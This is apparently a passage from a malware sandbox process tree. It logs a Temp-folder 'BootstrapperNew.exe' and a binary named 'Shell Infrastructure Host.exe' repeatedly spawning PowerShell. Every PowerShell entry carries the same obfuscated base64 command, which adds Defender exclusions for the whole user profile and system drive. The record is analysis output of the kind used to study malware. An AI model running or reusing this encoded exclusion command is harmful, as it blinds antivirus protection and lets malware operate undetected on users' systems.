        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        200⤵
        
        PID:872
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        200⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        200⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        201⤵
        
        PID:3232
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        201⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        201⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        202⤵
        
        PID:4184
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        202⤵
        
        PID:6984
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        202⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        203⤵
        
        PID:6168
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        203⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        203⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        204⤵
        
        PID:5648
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        204⤵
        
        PID:7680
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        204⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        205⤵
        
        PID:2236
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        205⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        205⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        206⤵
        
        PID:916
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        206⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        206⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        207⤵
        
        PID:3324
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        207⤵
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        207⤵
        
        PID:7736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        208⤵
        
        PID:6000
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        208⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        208⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        209⤵
        
        PID:8068
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        209⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        209⤵
        
        PID:8120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        210⤵
        
        PID:2384
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        210⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        210⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        211⤵
        
        PID:4596
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        211⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        211⤵
        
        PID:7528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        212⤵
        
        PID:1756
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        212⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        212⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        213⤵
        
        PID:232
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        213⤵
        
        PID:6592
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        213⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        214⤵
        
        PID:3456
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        214⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        214⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        215⤵
        
        PID:7320
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        215⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        215⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        216⤵
        
        PID:7416
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        216⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        216⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        217⤵
        
        PID:7784
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        217⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        217⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        218⤵
        
        PID:7720
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        218⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        218⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        219⤵
        
        PID:2076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        219⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        219⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        220⤵
        
        PID:3636
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        220⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        220⤵
        
        PID:8044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        221⤵
        
        PID:2044
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        221⤵
        
        PID:7144
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        221⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        222⤵
        
        PID:7068
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        222⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        222⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        223⤵
        
        PID:1084
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        223⤵
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        223⤵
        
        PID:7288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        224⤵
        
        PID:5944
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        224⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        224⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        225⤵
        
        PID:6336
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        225⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        225⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        226⤵
        
        PID:6808
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        226⤵
        
        PID:7776
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        226⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        227⤵
        
        PID:7688
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        227⤵
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        227⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
